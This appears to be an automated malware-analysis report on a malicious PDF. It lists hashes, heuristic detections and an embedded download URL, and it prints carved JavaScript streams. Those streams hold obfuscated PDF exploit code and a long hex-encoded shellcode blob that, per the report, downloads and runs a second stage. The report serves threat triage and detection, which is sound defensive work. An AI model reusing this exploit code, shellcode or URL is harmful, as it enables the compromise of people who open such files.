PDF / .PHP malware analysis — malicious · d6b3e224e54503df

MALICIOUS

PDF / .PHP

20.8 KB First seen: 2026-05-11

MD5: 9d49d509a2c0996b3d5720be20b485bc SHA-1: 43c942de6ae934204675113f8c8f9e50b0555e04 SHA-256: d6b3e224e54503dfca50445525a2371513018e8b77f1f3d2e04c75ce11dd2c6f

90 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 5

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://mysexsex.com/new/post.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0008_000.js`	pdf-javascript-stream	PDF /JS object 8 at offset 0x1E7	1735 bytes
SHA-256: `5b6a5d5586bb2fda53c7370efd9c7dad9a8d64d740a89d022cd0b5d42bebc7a4`
Detection ClamAV: No threats found Obfuscation or payload: likely 11 of 18 identifiers look randomly generated (e.g. 'sdfsfwefwFSADDDDDDDDDDDDFFASDFGFFDS') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script var BOSuUVhexi89 =/DDFFDD VCVV/ ["sdfsfwefwFSADDDDDDDDDDDDFFASDFGFFDS","e",/DDFFDD VCVV/"%",/DDFFDD VCVV/"a","ZSDSDSDFGGGGGGGGN","DccFFFFFFFFFFFFFFFFFFFFFFFFFccc","o"/DDFFDD VCVV/,"s"/DDFFDD VCVV/,"c","i","g"/DDFFDD VCVV/,"t"/DDFFDD VCVV/,"r","u"/DDFFDD VCVV/,"n"/DDFFDD VCVV/,"p"/DDFFDD VCVV/]; var cqCuIUZLOu77 = this; var cqCuIUZLOu77z = app; var vPgfBAuARB1 = BOSuUVhexi89[1]; var izCJZVPDZd3 = BOSuUVhexi89[2]; var DWFKUzebrV17 = cqCuIUZLOu77[vPgfBAuARB1+"v"+BOSuUVhexi89[3]+"l"]; var FmAUERehQQ18 = cqCuIUZLOu77[BOSuUVhexi89[13]+BOSuUVhexi89[14]+vPgfBAuARB1+"s"+BOSuUVhexi89[8]+BOSuUVhexi89[3]+BOSuUVhexi89[15]+vPgfBAuARB1]; DWFKUzebrV17("v"+BOSuUVhexi89[3]+"r ueORQJdymT15 = /"+BOSuUVhexi89[7]+BOSuUVhexi89[8]+BOSuUVhexi89[8]+"/"+BOSuUVhexi89[9]+BOSuUVhexi89[10]+";"); var tvqedOPGZw10 = cqCuIUZLOu77z[/DDFFDD VCVV/ "d"+BOSuUVhexi89[7-1]+BOSuUVhexi89[7+1]]; tvqedOPGZw10[BOSuUVhexi89[7]+"yn"+BOSuUVhexi89[8]+"A"+BOSuUVhexi89[14]+BOSuUVhexi89[14]+"o"+BOSuUVhexi89[11]+"S"+BOSuUVhexi89[8]+BOSuUVhexi89[3]+"n"](); var IVtoAuovvF4 = tvqedOPGZw10[BOSuUVhexi89[10]+vPgfBAuARB1+"tAnn"+BOSuUVhexi89[6]+BOSuUVhexi89[11]+BOSuUVhexi89[7]](0); var wrDGoqgACx5 = IVtoAuovvF4[0][BOSuUVhexi89[7]+"ubj"+vPgfBAuARB1+BOSuUVhexi89[8]+BOSuUVhexi89[11]]; var QlxTvWpLaP6 = wrDGoqgACx5/DDFFDD VCVV/[BOSuUVhexi89/DDFFDD VCVV/[11+1]+vPgfBAuARB1+/DDFFDD VCVV/BOSuUVhexi89[15]+"l"/DDFFDD VCVV/+BOSuUVhexi89/DDFFDD VCVV/[3]+BOSuUVhexi89/DDFFDD VCVV/[8]+vPgfBAuARB1]/DDFFDD VCVV/(ueORQJdymT15,izCJZVPDZd3); var oikiXlcLgY7=FmAUERehQQ18(FmAUERehQQ18(QlxTvWpLaP6)); DWFKUzebrV17(oikiXlcLgY7); if(j){ function run(){util[vvv2](vvv, new Date());} run();run(); try {thisz[vvv4][vvv3](null);} catch(e) {} run(); }
`javascript_obj0008_001.js`	pdf-javascript-stream	PDF /JS object 8 at offset 0x209	20793 bytes
SHA-256: `1b47ff4e4865b3b0220123e995b1467dad093929d2453fd51ddc1f9b76a3323a`
Detection ClamAV: No threats found Obfuscation or payload: likely 13 of 25 identifiers look randomly generated (e.g. 'scc25scc30scc41scc25scc37scc36scc25scc36') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var BOSuUVhexi89 =/DDFFDD VCVV/ ["sdfsfwefwFSADDDDDDDDDDDDFFASDFGFFDS","e",/DDFFDD VCVV/"%",/DDFFDD VCVV/"a","ZSDSDSDFGGGGGGGGN","DccFFFFFFFFFFFFFFFFFFFFFFFFFccc","o"/DDFFDD VCVV/,"s"/DDFFDD VCVV/,"c","i","g"/DDFFDD VCVV/,"t"/DDFFDD VCVV/,"r","u"/DDFFDD VCVV/,"n"/DDFFDD VCVV/,"p"/DDFFDD VCVV/]; var cqCuIUZLOu77 = this; var cqCuIUZLOu77z = app; var vPgfBAuARB1 = BOSuUVhexi89[1]; var izCJZVPDZd3 = BOSuUVhexi89[2]; var DWFKUzebrV17 = cqCuIUZLOu77[vPgfBAuARB1+"v"+BOSuUVhexi89[3]+"l"]; var FmAUERehQQ18 = cqCuIUZLOu77[BOSuUVhexi89[13]+BOSuUVhexi89[14]+vPgfBAuARB1+"s"+BOSuUVhexi89[8]+BOSuUVhexi89[3]+BOSuUVhexi89[15]+vPgfBAuARB1]; DWFKUzebrV17("v"+BOSuUVhexi89[3]+"r ueORQJdymT15 = /"+BOSuUVhexi89[7]+BOSuUVhexi89[8]+BOSuUVhexi89[8]+"/"+BOSuUVhexi89[9]+BOSuUVhexi89[10]+";"); var tvqedOPGZw10 = cqCuIUZLOu77z[/DDFFDD VCVV/ "d"+BOSuUVhexi89[7-1]+BOSuUVhexi89[7+1]]; tvqedOPGZw10[BOSuUVhexi89[7]+"yn"+BOSuUVhexi89[8]+"A"+BOSuUVhexi89[14]+BOSuUVhexi89[14]+"o"+BOSuUVhexi89[11]+"S"+BOSuUVhexi89[8]+BOSuUVhexi89[3]+"n"](); var IVtoAuovvF4 = tvqedOPGZw10[BOSuUVhexi89[10]+vPgfBAuARB1+"tAnn"+BOSuUVhexi89[6]+BOSuUVhexi89[11]+BOSuUVhexi89[7]](0); var wrDGoqgACx5 = IVtoAuovvF4[0][BOSuUVhexi89[7]+"ubj"+vPgfBAuARB1+BOSuUVhexi89[8]+BOSuUVhexi89[11]]; var QlxTvWpLaP6 = wrDGoqgACx5/DDFFDD VCVV/[BOSuUVhexi89/DDFFDD VCVV/[11+1]+vPgfBAuARB1+/DDFFDD VCVV/BOSuUVhexi89[15]+"l"/DDFFDD VCVV/+BOSuUVhexi89/DDFFDD VCVV/[3]+BOSuUVhexi89/DDFFDD VCVV/[8]+vPgfBAuARB1]/DDFFDD VCVV/(ueORQJdymT15,izCJZVPDZd3); var oikiXlcLgY7=FmAUERehQQ18(FmAUERehQQ18(QlxTvWpLaP6)); DWFKUzebrV17(oikiXlcLgY7); if(j){ function run(){util[vvv2](vvv, new Date());} run();run(); try {thisz[vvv4][vvv3](null);} catch(e) {} run(); } endstream endobj 7 0 obj << /Length 18750 >> stream scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc37scc36scc25scc36scc35scc25scc37scc32scc25scc37scc33scc25scc36scc39scc25scc36scc46scc25scc36scc45scc25scc33scc42scc25scc37scc44scc25scc37scc44scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc32scc38scc25scc36scc43scc25scc37scc36scc25scc33scc45scc25scc33scc39scc25scc32scc39scc25scc32scc36scc25scc32scc36scc25scc32scc38scc25scc36scc43scc25scc37scc36scc25scc33scc43scc25scc33scc39scc25scc32scc45scc25scc33scc33scc25scc32scc39scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc41scc25scc33scc44scc25scc33scc31scc25scc33scc34scc25scc33scc30scc25scc33scc30scc25scc33scc42scc25scc37scc44scc25scc32scc30scc25scc36scc35scc25scc36scc43scc25scc37scc33scc25scc36scc35scc25scc32scc30scc25scc36scc39scc25scc36scc36scc25scc32scc38scc25scc32scc38scc25scc36scc43scc25scc37scc36scc25scc33scc45scc25scc33scc38scc25scc32scc45scc25scc33scc31scc25scc33scc32scc25scc32scc39scc25scc32scc36scc25scc32scc36scc25scc32scc38scc25scc36scc43scc25scc37scc36scc25scc33scc43scc25scc33scc38scc25scc32scc45scc25scc33scc32scc25scc32scc39scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc41scc25scc33scc44scc25scc33scc32scc25scc33scc39scc25scc33scc30scc25scc33scc30scc25scc33scc42scc25scc37scc44scc25scc36scc35scc25scc36scc43scc25scc37scc33scc25scc36scc35scc25scc37scc42scc25scc37scc44scc25scc30scc41scc25scc37scc33scc25scc33scc44scc25scc36scc45scc25scc36scc35scc25scc37scc37scc25scc32scc30scc25scc34scc31scc25scc37scc32scc25scc37scc32scc25scc36scc31scc25scc37scc39scc25scc32scc38scc25scc32scc39scc25scc33scc42scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc37scc33scc25scc36scc38scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc32scc32scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc33scc34scc25scc34scc35scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc35scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc32scc25scc33scc33scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc33scc25scc33scc35scc25scc33scc37scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc33scc25scc33scc37scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc33scc36scc25scc34scc36scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc36scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc33scc25scc33scc32scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc33scc25scc33scc33scc25scc34scc36scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc34scc25scc33scc39scc25scc34scc33scc25scc33scc39scc25scc32scc35scc25scc37scc35scc25scc34scc31scc25scc34scc34scc25scc33scc34scc25scc33scc31scc25scc32scc35scc25scc37scc35scc25scc34scc34scc25scc34scc32scc25scc33scc33scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc34scc36scc25scc33scc33scc25scc33scc36scc25scc32scc35scc25scc37scc35scc25scc33scc31scc25scc33scc34scc25scc34scc32scc25scc34scc35scc25scc32scc35scc25scc37scc35scc25scc33scc33scc25scc33scc38scc25scc33scc32scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc34scc25scc34scc36scc25scc33scc32scc25scc32scc35scc25scc37scc35scc25scc34scc33scc25scc33scc31scc25scc33scc30scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc34scc34scc25scc34scc33scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc34scc34scc25scc34scc31scc25scc33scc30scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc34scc32scc25scc33scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc33scc25scc34scc32scc25scc34scc35scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc35scc25scc34scc34scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc34scc35scc25scc34scc35scc25scc33scc37scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc34scc35scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc33scc25scc33scc32scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc33scc36scc25scc34scc34scc25scc34scc34scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc34scc33scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc32scc25scc33scc34scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc31scc25scc34scc33scc25scc33scc35scc25scc34scc35scc25scc32scc35scc25scc37scc35scc25scc34scc34scc25scc34scc34scc25scc33scc30scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc34scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc33scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc34scc33scc25scc33scc33scc25scc34scc33scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc32scc25scc33scc37scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc34scc25scc33scc36scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc35scc25scc33scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc33scc34scc25scc33scc32scc25scc34scc35scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc33scc25scc33scc36scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc34scc25scc33scc33scc25scc33scc30scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc34scc33scc25scc33scc33scc25scc34scc31scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc34scc35scc25scc33scc35scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc38scc25scc33scc36scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc30scc25scc33scc36scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc34scc33scc25scc33scc30scc25scc33scc33scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc33scc25scc33scc36scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc33scc25scc33scc30scc25scc33scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc34scc33scc25scc33scc37scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc34scc25scc33scc30scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc32scc25scc33scc30scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc31scc25scc34scc33scc25scc33scc37scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc32scc25scc34scc31scc25scc34scc34scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc38scc25scc33scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc39scc25scc34scc35scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc34scc25scc33scc30scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc34scc25scc33scc33scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc34scc33scc25scc33scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc34scc25scc33scc30scc25scc33scc38scc25scc34scc32scc25scc32scc35scc25scc37scc35scc25scc33scc39scc25scc33scc35scc25scc33scc33scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc35scc25scc34scc32scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc34scc35scc25scc33scc34scc25scc34scc35scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc33scc38scc25scc34scc35scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc33scc38scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc34scc33scc25scc33scc38scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc33scc33scc25scc33scc30scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc33scc34scc25scc33scc32scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc33scc33scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc39scc25scc33scc35scc25scc34scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc34scc32scc25scc34scc36scc25scc33scc35scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc31scc25scc34scc31scc25scc33scc33scc25scc33scc36scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc30scc25scc33scc32scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc36scc25scc34scc35scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc32scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc33scc34scc25scc33scc35scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc34scc34scc25scc34scc36scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc34scc32scc25scc34scc31scc25scc33scc35scc25scc33scc32scc25scc32scc35scc25scc37scc35scc25scc34scc34scc25scc34scc32scc25scc33scc33scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc33scc33scc25scc33scc35scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc34scc32scc25scc33scc35scc25scc33scc32scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc33scc33scc25scc33scc32scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc34scc34scc25scc33scc30scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc34scc32scc25scc34scc36scc25scc33scc35scc25scc34scc34scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc35scc25scc33scc39scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc34scc35scc25scc33scc38scc25scc34scc31scc25scc32scc35scc25scc37scc35scc25scc33scc35scc25scc33scc33scc25scc34scc35scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc38scc25scc33scc33scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc30scc25scc33scc34scc25scc34scc35scc25scc34scc33scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc34scc33scc25scc33scc38scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc33scc32scc25scc33scc32scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc34scc34scc25scc33scc30scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc34scc35scc25scc34scc32scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc33scc32scc25scc34scc34scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc33scc38scc25scc33scc37scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc33scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc33scc35scc25scc33scc32scc25scc32scc35scc25scc37scc35scc25scc34scc35scc25scc33scc38scc25scc34scc34scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc34scc34scc25scc33scc37scc25scc32scc35scc25scc37scc35scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc34scc25scc33scc36scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc30scc25scc33scc37scc25scc33scc34scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc34scc36scc25scc33scc33scc25scc34scc31scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc34scc25scc33scc32scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc33scc25scc33scc37scc25scc33scc39scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc38scc25scc33scc36scc25scc33scc35scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc33scc35scc25scc33scc37scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc34scc35scc25scc33scc37scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc36scc25scc33scc36scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc34scc36scc25scc33scc36scc25scc34scc34scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc33scc35scc25scc33scc36scc25scc34scc35scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc34scc36scc25scc33scc37scc25scc33scc37scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc34scc36scc25scc33scc37scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc34scc25scc33scc37scc25scc33scc33scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc30scc25scc33scc32scc25scc34scc35scc25scc32scc35scc25scc37scc35scc25scc33scc37scc25scc33scc30scc25scc33scc36scc25scc33scc38scc25scc32scc35scc25scc37scc35scc25scc33scc36scc25scc33scc35scc25scc33scc33scc25scc34scc36scc25scc32scc35scc25scc37scc35scc25scc33scc33scc25scc33scc38scc25scc33scc33scc25scc34scc34scc25scc32scc35scc25scc37scc35scc25scc33scc32scc25scc33scc36scc25scc33scc32scc25scc33scc36scc25scc32scc32scc25scc33scc42scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc33scc44scc25scc32scc32scc25scc32scc35scc25scc37scc35scc25scc33scc39scc25scc33scc30scc25scc33scc39scc25scc33scc30scc25scc32scc35scc25scc37scc35scc25scc33scc39scc25scc33scc30scc25scc33scc39scc25scc33scc30scc25scc32scc32scc25scc33scc42scc25scc30scc41scc25scc37scc33scc25scc36scc38scc25scc33scc44scc25scc37scc35scc25scc36scc45scc25scc36scc35scc25scc37scc33scc25scc36scc33scc25scc36scc31scc25scc37scc30scc25scc36scc35scc25scc32scc38scc25scc37scc33scc25scc36scc38scc25scc32scc39scc25scc33scc42scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc33scc44scc25scc37scc35scc25scc36scc45scc25scc36scc35scc25scc37scc33scc25scc36scc33scc25scc36scc31scc25scc37scc30scc25scc36scc35scc25scc32scc38scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc32scc39scc25scc33scc42scc25scc30scc41scc25scc37scc37scc25scc36scc38scc25scc36scc39scc25scc36scc43scc25scc36scc35scc25scc32scc38scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc32scc30scc25scc33scc43scc25scc33scc44scc25scc32scc30scc25scc33scc30scc25scc37scc38scc25scc33scc38scc25scc33scc30scc25scc33scc30scc25scc33scc30scc25scc32scc39scc25scc32scc30scc25scc37scc42scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc32scc42scc25scc33scc44scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc33scc42scc25scc37scc44scc25scc30scc41scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc33scc44scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc32scc45scc25scc37scc33scc25scc37scc35scc25scc36scc32scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc32scc38scc25scc33scc30scc25scc32scc43scc25scc33scc30scc25scc37scc38scc25scc33scc38scc25scc33scc30scc25scc33scc30scc25scc33scc30scc25scc32scc30scc25scc32scc44scc25scc32scc30scc25scc37scc33scc25scc36scc38scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc32scc39scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc38scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc36scc39scc25scc33scc43scc25scc36scc41scc25scc33scc42scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc32scc30scc25scc37scc42scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc33scc44scc25scc37scc33scc25scc37scc34scc25scc37scc32scc25scc32scc30scc25scc32scc42scc25scc32scc30scc25scc37scc33scc25scc36scc38scc25scc33scc42scc25scc37scc44scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc37scc36scc25scc37scc36scc25scc37scc36scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc32scc32scc25scc37scc30scc25scc34scc30scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc32scc30scc25scc33scc41scc25scc32scc30scc25scc37scc39scc25scc37scc39scc25scc37scc39scc25scc37scc39scc25scc33scc31scc25scc33scc31scc25scc33scc31scc25scc32scc32scc25scc33scc42scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc37scc36scc25scc37scc36scc25scc37scc36scc25scc33scc32scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc32scc32scc25scc37scc30scc25scc37scc32scc25scc36scc39scc25scc36scc45scc25scc37scc34scc25scc36scc34scc25scc32scc32scc25scc33scc42scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc37scc36scc25scc37scc36scc25scc37scc36scc25scc33scc3